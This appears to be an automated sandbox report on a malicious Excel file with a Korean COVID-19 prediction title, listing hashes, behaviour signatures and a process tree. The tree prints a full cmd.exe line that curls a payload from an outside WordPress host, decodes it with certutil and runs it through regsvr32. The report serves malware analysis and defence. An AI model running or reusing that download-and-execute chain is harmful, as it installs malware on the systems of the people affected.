Overview

overview

10

Static

static

8

COVID-19 �...��.xls

windows7_x64

10

COVID-19 �...��.xls

windows10_x64

10

Analysis

  • max time kernel
    63s
  • max time network
    32s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    13-07-2020 10:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    COVID-19 감염자 및 사망자 예측.xls

  • Size

    1.1MB

  • MD5

    268efe92a6e16c89e62bf0c32113d0c9

  • SHA1

    d42d766a18fc56170ff2978a2bf07bd9cafac3e8

  • SHA256

    00e82dd014370c9db5a95fd0fd3a5438e4a51f4d64a15ddffaa77f2e806d2a74

  • SHA512

    ae272d7d2569afed6e058bd8ebd78adbebd88d60501f9ccc011d0fe1df41a7a5cb5e619b504aafafc23c02dd873f39a279f8939b8ba79b7815fad96bc29fd7f4

Score
10/10

Malware Config

Signatures

  • Modifies registry class 280 IoCs
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of WriteProcessMemory 17 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present

Processes

  • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\COVID-19 감염자 및 사망자 예측.xls"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1456
    • C:\Windows\system32\cmd.exe
      cmd /c curl "http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%\1.tmp"&certutil -decode "%temp%\1.tmp" "%temp%\lk.tmp"&cmd /c del "%temp%\1.tmp"&timeout 60&regsvr32 /s "%temp%\lk.tmp"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:744
      • C:\Windows\system32\certutil.exe
        certutil -decode "C:\Users\Admin\AppData\Local\Temp\1.tmp" "C:\Users\Admin\AppData\Local\Temp\lk.tmp"
        3⤵
          PID:1100
        • C:\Windows\system32\cmd.exe
          cmd /c del "C:\Users\Admin\AppData\Local\Temp\1.tmp"
          3⤵
            PID:1088
          • C:\Windows\system32\timeout.exe
            timeout 60
            3⤵
            • Delays execution with timeout.exe
            PID:1076
          • C:\Windows\system32\regsvr32.exe
            regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\lk.tmp"
            3⤵
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:1940

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1456-0-0x0000000007DB0000-0x0000000007FB0000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1456-1-0x0000000007DB0000-0x0000000007FB0000-memory.dmp

        Filesize

        2.0MB

        Download